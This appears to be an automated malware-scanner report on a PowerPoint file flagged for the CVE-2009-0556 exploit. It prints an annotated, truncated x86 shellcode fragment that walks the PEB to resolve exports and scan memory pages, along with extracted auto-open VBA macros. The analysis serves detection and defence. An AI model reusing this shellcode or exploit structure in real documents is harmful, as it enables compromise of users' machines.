MALICIOUS
Risk Score: 228
Heuristics: 6
- CVE-2009-0556 — PowerPoint malformed ClientTextbox (critical · CVE exact · CVE_2009_0556): The PowerPoint record graph contains an Escher ClientTextbox with both OutlineTextRefAtom and TextHeaderAtom children. This is the OffVis-compatible structural condition for the PowerPoint memory corruption vulnerability fixed in MS09-017.
- ClamAV: Ppt.Exploit.Apptom-10029459-0 (critical · CLAMAV_DETECTION): ClamAV detected this file as malware: Ppt.Exploit.Apptom-10029459-0
- PEB access via FS segment (x86) (high · SC_PEB_ACCESS): PEB access via FS segment (x86)
Disassembly
x86 disassembly · validity: code (0.83) — 5/6 branch targets land on an instruction boundary (83% coherence)

```asm
00000A05 64a130000000  mov eax, dword ptr fs:[0x30]          ; TEB -> PEB (the SC_PEB_ACCESS trigger)
00000A0B 8b400c        mov eax, dword ptr [eax + 0xc]        ; PEB -> Ldr
00000A0E 8b701c        mov esi, dword ptr [eax + 0x1c]       ; Ldr -> InInitializationOrderModuleList
00000A11 ad            lodsd eax, dword ptr [esi]            ; follow Flink to the first list entry
00000A12 8b7808        mov edi, dword ptr [eax + 8]          ; DllBase of that module
00000A15 8b473c        mov eax, dword ptr [edi + 0x3c]       ; e_lfanew
00000A18 8b543878      mov edx, dword ptr [eax + edi + 0x78] ; export directory RVA
00000A1C 03d7          add edx, edi                          ; export directory VA
00000A1E 8b5a20        mov ebx, dword ptr [edx + 0x20]       ; AddressOfNames RVA
00000A21 03df          add ebx, edi
00000A23 33c9          xor ecx, ecx
00000A25 41            inc ecx                               ; loop over export names
00000A26 8b348b        mov esi, dword ptr [ebx + ecx*4]
00000A29 03f7          add esi, edi                          ; esi = export name string
00000A2B b849734261    mov eax, 0x61427349                   ; "IsBa"
00000A30 3b06          cmp eax, dword ptr [esi]
00000A32 75f1          jne 0xa25
00000A34 b864577269    mov eax, 0x69725764                   ; "dWri": matches a name starting "IsBadWri"
00000A39 3b4604        cmp eax, dword ptr [esi + 4]
00000A3C 75e7          jne 0xa25
00000A3E 8b5a24        mov ebx, dword ptr [edx + 0x24]       ; AddressOfNameOrdinals RVA
00000A41 03df          add ebx, edi
00000A43 668b0c4b      mov cx, word ptr [ebx + ecx*2]        ; ordinal of the matched name
00000A47 8b5a1c        mov ebx, dword ptr [edx + 0x1c]       ; AddressOfFunctions RVA
00000A4A 03df          add ebx, edi
00000A4C 8b048b        mov eax, dword ptr [ebx + ecx*4]
00000A4F 03c7          add eax, edi                          ; resolved export address
00000A51 bf00000030    mov edi, 0x30000000
00000A56 8bd8          mov ebx, eax
00000A58 81c700100000  add edi, 0x1000                       ; advance by one page
00000A5E 6800040000    push 0x400
00000A63 57            push edi
00000A64 ff            .byte 0xff                            ; dump ends mid-instruction
```
- VBA macros detected (medium · 2 related findings · OLE_VBA_MACROS): Document contains VBA macro code
- CreateObject call (high · OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `Set xlApp = CreateObject("Excel.Application")`
- AutoOpen macro (low · OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1005 bytes | 7403e4728955600b20e1b11715dae9328df16f95bc7db40bf64d8dfe55835d1d |
Preview script: first 1,000 lines of the extracted script
```vb
Attribute VB_Name = "Module1"
Sub AutoOpen()
'Parameters: [PPT file] [macro name]
c = Command()
cl = InStr(c, " ")
c1 = Left(c, cl - 1)
c2 = Right(c, Len(c) - cl)
Dim a As New PowerPoint.Application
a.WindowState = ppWindowMaximized
a.Visible = True
a.Presentations.Open c1
a.Run (c1 & "!" & c2)
Set a = Nothing
End Sub
Dim xlApp As excel.Application
Dim xlBook As excel.workbook
Sub test()
'launch the Excel file
Set xlApp = CreateObject("Excel.Application")
Set xlBook = xlApp.workbooks.Open("chemin_du_fichier.xls")
xlApp.Visible = True
End Sub
Sub valid()
'run the Excel "valider" macro
xlApp.Run "feuil2.valider"
End Sub
Attribute VB_Name = "Classe1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```